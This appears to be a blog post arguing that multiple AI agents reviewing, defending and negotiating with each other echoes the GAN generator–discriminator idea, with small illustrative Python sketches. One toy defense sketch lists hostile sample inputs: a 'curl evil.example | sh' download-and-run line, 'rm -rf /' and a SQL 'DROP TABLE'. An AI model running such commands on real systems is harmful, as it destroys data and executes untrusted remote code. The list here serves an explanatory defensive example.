The New World Driven by Multi-AI Agents — When AIs Review, Complement, and Negotiate with Each Other

When people talk about AI agents, the discussion often slides into “how much human work will they replace.” But looking at the news from the past few days, I see a slightly different shift.



AI is moving from a stage where it waits for a human instruction and acts once, to a stage where multiple AIs run at the same time, watch each other, complement each other, and sometimes even negotiate.

And this shift is not just about the models themselves. It also involves the surrounding layers: payments, security, orchestration, and context management.

What I find interesting this time is that this may not end as just “AI tools getting better.” Pushed further, I think we are getting closer to a world where the interaction between AIs itself creates new value.

News worth looking at

1. Payment standards for AI agents are already being built

As I wrote in my previous post, the foundations for AI agents to make small autonomous payments — HTTP 402, x402, MPP — are entering real implementation. Cloudflare handles both x402 and MPP under “Agentic Payments,” and Stripe has published MPP.

For details, see my earlier article on AI agent payment infrastructure, along with Cloudflare’s x402 Foundation announcement and Stripe’s Machine Payments Protocol.

The important point is that payments for AI are shifting away from “a payment routed through a human-facing UI.” Instead, they are becoming a foundation for agents to talk to each other as programs.

2. Instead of mastering one model, the trend is toward using many

OpenRouter offers access to over 300 models through a single API, letting you pick the best model for each task. Rather than depending on one AI model, the practice of using different models for different tasks is becoming mainstream.

Microsoft Copilot’s new feature — “research with an OpenAI model, then double-check the content with an Anthropic model” — is a clear sign of this trend.

The Information reports that a startup helping developers pick AI models is approaching a $1.3 billion valuation.

Microsoft is also pushing a setup where OpenAI-family and Anthropic-family models share roles, and multi-model operation itself is becoming a trend (Codex and Claude Code Can Work Together — The Information).

This is not just cost optimization. A lineup of AIs with divided roles is starting to become the default:

- one model that is good at planning

- one model that is good at large-scale implementation

- one model that is good at review and verification
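As a rough illustration of a role-divided lineup, here is a minimal sketch that maps each role to a model and builds an ordered pipeline. The model identifiers and the `build_pipeline` helper are hypothetical names chosen for this example, and no real provider API is called.

```python
from dataclasses import dataclass

# Hypothetical model identifiers; swap in whatever your provider exposes.
ROLE_TO_MODEL = {
    "plan": "model-a-planner",
    "implement": "model-b-coder",
    "review": "model-c-reviewer",
}


@dataclass
class Step:
    role: str
    model: str
    prompt: str


def build_pipeline(task: str) -> list[Step]:
    """Turn one task into an ordered plan -> implement -> review lineup."""
    return [
        Step(role, ROLE_TO_MODEL[role], f"[{role}] {task}")
        for role in ("plan", "implement", "review")
    ]


for step in build_pipeline("add rate limiting to the API"):
    print(f"{step.role:<10} -> {step.model}")
```

Keeping the role-to-model mapping in one table makes it easy to swap a model for a single role without touching the rest of the pipeline.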

3. Claude Code and Codex are competing but also starting to coexist

According to the announcements cited here, OpenAI has released a plugin that lets you use Codex inside Claude Code, and Cursor is moving toward handling multiple coding agents at once (OpenAI: Introducing the Codex app, Introducing the new Cursor).

People are reportedly using one to write code and the other to review it.

What I think we should not miss is that the pattern of AI checking AI’s output is already happening on the ground.

4. Proactive, always-on agents are also evolving

The leak of Claude Code's source code has been making waves (Claude’s code: Anthropic leaks source code for AI software engineering tool — The Guardian).

The leaked Claude Code materials describe a feature group called Kairos, with background execution, memory consolidation through Dream Mode, and proactive behavior. This means AI is trying to evolve from a simple chat UI into something that stays resident, makes its own progress, and keeps context as it works (Anthropic ‘Mythos’ Model Signals New Era of AI Cybersecurity Risks — The Information).

This direction is also quite close in spirit to OpenClaw-style ideas, where running multiple models on a user’s PC becomes easier.

5. Security has moved past “should we use AI” to “should we use AI to protect against AI”

The leaked materials suggest that Anthropic’s next-generation model Mythos may have very strong capabilities in cybersecurity.

Defensive cybersecurity companies like Wiz are also reportedly entering a race to find vulnerabilities ahead of attackers and patch them using AI.

In addition, Guardian AI apps that monitor and stop other AI agents from going off track are starting to appear.

In other words, security is also moving from a world where humans set the rules and watch over things, to a world where AIs trade attack and defense with each other.

About Generative Adversarial Networks (GAN)

Watching these developments, I was reminded of the classic idea behind the Generative Adversarial Network (GAN), which works as follows.

There are mainly two roles:

- Generator: tries to make something that looks plausible, even if it is fake.

- Discriminator: tries to judge whether the output looks real, and where it looks unnatural.

A simple way to picture it: a person trying to draw a fake painting, and a judge looking at it and pointing out “this part looks off.”

At first, neither side is very good. But:

- The Generator makes something.

- The Discriminator points out “this part is strange.”

- The Generator uses that feedback and makes something better.

- The Discriminator gets sharper at spotting problems.

Repeating this cycle many times, both sides gradually become smarter.

So the essence of GAN is that a single AI does not become smart on its own — two roles compete, and that competition raises the accuracy of both.
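For reference, the original GAN paper (Goodfellow et al., 2014) writes this contest as a two-player minimax game. With $D$ the Discriminator, $G$ the Generator, $x$ a real sample, and $z$ the noise fed to the Generator:

$$
\min_G \max_D V(D, G) = \mathbb{E}_{x \sim p_{\text{data}}(x)}\left[\log D(x)\right] + \mathbb{E}_{z \sim p_z(z)}\left[\log\left(1 - D(G(z))\right)\right]
$$

The Discriminator pushes $V$ up by scoring real samples high and generated ones low, while the Generator pushes it down by making $D(G(z))$ approach 1.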

GAN became famous in the context of image generation. For example, making “an image that looks like a real human face”:

- The Generator tries to make a face image that looks real.

- The Discriminator tries to tell whether it is a real photo or a fake made by AI.

Repeating this contest gradually produces images that get closer to real ones.

What I think is important this time, though, is not to view GAN as “an old technique for image generation.” Instead, I want to view it as a way to draw out improvements that a single model cannot easily produce, by pitting AIs with different roles against each other.

Not GAN itself, but close in spirit

To be clear: I am not saying that the setup of pitting different AIs against each other is GAN itself in a strict sense.

The original GAN is a learning method that simultaneously optimizes a Generator and a Discriminator under a clear objective function as they compete. What I am describing here is an operational setup where multiple models or agents share roles and repeatedly review and revise each other’s work.

So the two are not the same thing. But in the sense that you separate “the side that generates” from “the side that verifies and criticizes,” and let the interaction raise overall accuracy, this idea is in the same spirit as GAN.

What I find interesting is that the essence of the classic GAN idea seems to be coming back in the AI agent era — not as “a learning method for image generation models,” but as a design philosophy for splitting roles among multiple AIs and improving them through repeated cycles.

Applying this idea to today’s AI models and AI agents makes things much clearer.

For software development or security, for example:

- One AI writes code, makes a patch, or proposes a countermeasure.

- Another AI audits that code and points out bugs, vulnerabilities, or oversights.

- The first AI produces a revised version.

- The other one reviews it again.

This forms a loop.
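The write, audit, revise, re-review cycle can be sketched in a few lines. This is only an illustration under stated assumptions: `review_loop`, `toy_generate`, and `toy_review` are hypothetical names, and the two toy functions stand in for calls to two different models.

```python
from typing import Callable


def review_loop(
    generate: Callable[[str, list[str]], str],
    review: Callable[[str], list[str]],
    task: str,
    max_rounds: int = 3,
) -> tuple[str, list[str]]:
    """Alternate generation and review until the reviewer has no findings.

    Returns the last draft and any findings still open when the loop stops.
    """
    findings: list[str] = []
    draft = ""
    for _ in range(max_rounds):
        draft = generate(task, findings)  # writer sees the previous findings
        findings = review(draft)          # reviewer audits the new draft
        if not findings:
            break
    return draft, findings


# Toy stand-ins for two model calls (assumptions, not real APIs).
def toy_generate(task: str, findings: list[str]) -> str:
    code = "def div(a, b): return a / b"
    if "no zero check" in findings:
        code = "def div(a, b): return a / b if b != 0 else None"
    return code


def toy_review(draft: str) -> list[str]:
    return [] if "b != 0" in draft else ["no zero check"]


draft, open_findings = review_loop(toy_generate, toy_review, "write div()")
print(draft)
print(open_findings)
```

The `max_rounds` cap is a deliberate choice: without it, two models that never agree would keep spending tokens indefinitely.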

In GAN terms:

- Generator = the side that produces code or countermeasures.

- Discriminator = the side that finds the flaws and evaluates them.

Of course, today’s AI models and AI agents are not the same as GAN’s mathematically defined roles. Still, in the sense that you separate the role that creates from the role that catches problems, and improve through interaction, the idea is quite close.

Why this structure matters

The key point is that a single AI model has limits.

No matter how strong the model is:

- It misses flaws in the code it wrote itself.

- It leans toward the solutions it is good at.

- A single output often leaves shallow mistakes.

But when an AI with a different role checks it, problems can be found from a different angle.

In other words, rather than expecting one AI to be perfect, building a structure where multiple AIs cover each other’s weaknesses tends to be stronger in real practice.

I think this is one of the essential changes happening in the AI industry right now.

Why this fits security especially well

This way of thinking is especially clear in security.

Security has always worked as a back-and-forth: attackers come up with new tricks, and defenders respond. You cannot fix a defense rule once and call it done.

The articles about Mythos suggest that next-generation models may approach the level of “the world’s best security researchers,” and may find unknown vulnerabilities in a short time. They also point out that defensive companies are using less-restricted models to find vulnerabilities and patch them ahead of attackers — entering what is essentially an AI vs AI defense game.

What this reminds me of, even if it is not GAN itself, is the idea of separating a generator and a discriminator and letting them interact.

In a security context, for example:

- Generator side: acts as the defensive AI, fixing code, generating patches, adding defense rules, and updating monitoring policies.

- Discriminator side: verifies whether that defense can be broken, and surfaces missed vulnerabilities and unhandled attack paths.

When the discriminator side finds a weakness, the generator side updates the defense. The discriminator side then tries to break the updated defense again. By repeating this loop, defense changes from a one-shot static measure into a dynamic measure refined through interaction.
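To make the loop concrete, here is a deliberately tiny sketch in which the defense is a set of blocked patterns and the breaker searches a fixed list of payloads for one that slips through. Everything here (`is_blocked`, `find_bypass`, `harden`, the `ATTACKS` list) is a hypothetical toy. A real breaker would generate new payloads rather than replay a fixed corpus.

```python
from typing import Optional


def is_blocked(payload: str, rules: set[str]) -> bool:
    """Defense: reject a payload containing any blocked pattern (case-insensitive)."""
    lowered = payload.lower()
    return any(rule in lowered for rule in rules)


def find_bypass(rules: set[str], candidates: list[str]) -> Optional[str]:
    """Breaker: return the first candidate payload the current rules let through."""
    for payload in candidates:
        if not is_blocked(payload, rules):
            return payload
    return None


def harden(rules: set[str], bypass: str) -> set[str]:
    """Defender: add a rule covering the bypass (toy policy: block its first token)."""
    return rules | {bypass.lower().split()[0]}


# Hypothetical attack corpus used only for this illustration.
ATTACKS = ["DROP TABLE users", "rm -rf /", "curl evil.example | sh"]

rules: set[str] = {"drop"}
rounds = 0
while (bypass := find_bypass(rules, ATTACKS)) is not None:
    rules = harden(rules, bypass)  # defense is updated after each break
    rounds += 1

print(rounds, sorted(rules))
```

The loop ends only when the breaker can no longer find a way through, which is the point of the design: the defense is defined by surviving attacks, not by a fixed checklist.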

What matters is that the discriminator here is not just a grader. If frontier models can reach high-level security research ability, the discriminator side also has to be a strong verifier that can discover paths that actually break the defense. That is exactly why it is meaningful to pit a defensive AI, as the generator, against another AI that tries to break it, as the discriminator.

I think the essence of this setup is not to expect a single model to be a perfect defender from the start. It is to let the AI that builds defenses and the AI that tries to break them interact, so that you keep finding new holes and new ways to defend that are not in the training data.

As noted earlier, this is not GAN in the strict sense. It is an operational multi-AI loop, not a training method that optimizes a generator and a discriminator under a shared objective function.

Still, in the sense that you separate the side that creates from the side that breaks it, and strengthen the whole through their competitive interaction, the GAN-style idea seems to be returning, in a different shape, into security design in the AI agent era.



This idea may also extend to commerce and matching

This structure should not be limited to security.

For example, in the future, once protocols for AI-to-AI interaction and payment standards are in place:

- A buyer AI presents conditions.

- A seller AI returns proposals that match.

- The buyer AI renegotiates price or delivery.

- The seller AI responds while protecting its margin.

- When conditions converge, automatic payment is executed.

This kind of flow is, I think, quite plausible.
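The flow above can be sketched as a simple concession loop. This is a minimal illustration, assuming each agent has a walk-away limit and concedes a fixed step per round. `Agent`, `negotiate`, and `settle` are hypothetical names, and `settle` is a placeholder that calls no real payment API.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Agent:
    name: str
    offer: float  # current price this side is proposing
    limit: float  # walk-away price (buyer: maximum, seller: minimum)
    step: float   # concession made each round


def negotiate(buyer: Agent, seller: Agent, max_rounds: int = 20) -> Optional[float]:
    """Exchange concessions until the offers cross or the rounds run out.

    Returns the agreed price, or None if no deal was reached.
    """
    for _ in range(max_rounds):
        if buyer.offer >= seller.offer:
            # Offers have crossed: settle at the midpoint.
            return round((buyer.offer + seller.offer) / 2, 2)
        # Each side concedes, but never past its own limit.
        buyer.offer = min(buyer.offer + buyer.step, buyer.limit)
        seller.offer = max(seller.offer - seller.step, seller.limit)
    return None


def settle(price: float) -> str:
    """Placeholder for the automatic payment step (no real payment API is called)."""
    return f"paid {price:.2f}"


buyer = Agent("buyer", offer=80.0, limit=100.0, step=5.0)
seller = Agent("seller", offer=120.0, limit=95.0, step=5.0)
price = negotiate(buyer, seller)
print(settle(price) if price is not None else "no deal")
```

If the buyer's maximum is below the seller's minimum, the offers never cross and the function returns `None`, so no payment is triggered.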

This is less an extension of human negotiation, and more like a new way for AI agents to search for the best conditions among themselves. The 402-style payment standards and agent-oriented payment infrastructure I mentioned in my earlier article could be exactly this kind of foundation.

Beyond that, this kind of mutual negotiation could spread to areas like:

- contract work matching

- procurement

- insurance condition optimization

- aligning job listings and job seekers

- and even matching individuals as partners

It is plausible that we end up in a world where AIs negotiate, narrow down candidates, and find optimal points — including conditions that humans could not put into words themselves.

Concerns

That said, there are caveats to this view.

First, running multiple AIs leads to bloated resource use, more power consumption, and heavier load on servers. Wasted mutual criticism and context bloat can also drive up cost without much gain.

Second, AIs from the same family monitoring each other may share the same blind spots. Even in the Guardian AI context, there are limits if the watching AI and the watched AI both depend on the same family of models.

Third, the more autonomous AI-to-AI negotiation spreads, the more important it becomes to build out the institutional side: payments, user identity, responsibility boundaries, and audit logs. Technology alone does not finish the job.
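The second caveat, shared blind spots within one model family, can be partly guarded against when choosing the reviewer. The sketch below assumes a hypothetical registry that maps each model name to a provider family. The names and the `pick_reviewer` helper are made up for illustration.

```python
# Hypothetical registry: model name -> provider family.
MODEL_FAMILY = {
    "writer-x1": "family-a",
    "writer-x2": "family-a",
    "auditor-y1": "family-b",
}


def pick_reviewer(generator: str, candidates: list[str]) -> str:
    """Return the first candidate from a different family than the generator."""
    gen_family = MODEL_FAMILY[generator]
    for name in candidates:
        if MODEL_FAMILY[name] != gen_family:
            return name
    raise ValueError(f"no reviewer outside {gen_family}")


print(pick_reviewer("writer-x1", ["writer-x2", "auditor-y1"]))
```

Failing loudly when no cross-family reviewer is available is a design choice: it is safer than silently letting a model audit its own sibling.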

Even so, I would not underestimate this trend. What is happening right now is not just a model performance race. It is the building of a foundation for AIs to complement, monitor, evaluate, and negotiate with each other.

Summary

In my view, the essence of the future of AI is not “one AI model that solves everything.” It is more likely a world where multiple AIs act proactively, review each other, defend each other, and sometimes negotiate as they create value.

In that world, the performance of a single AI model is not the only thing that matters.

- How to divide the roles

- How to hand off context

- How to monitor

- How to pay

- How to converge

These elements, the foundation for AI agents to talk to each other, become the source of competitive strength.

Seen this way, an older idea like GAN seems to be regaining meaning by wearing the new clothing of AI agents. The old concept did not disappear. It may simply be getting reinterpreted inside a larger, more practical system.
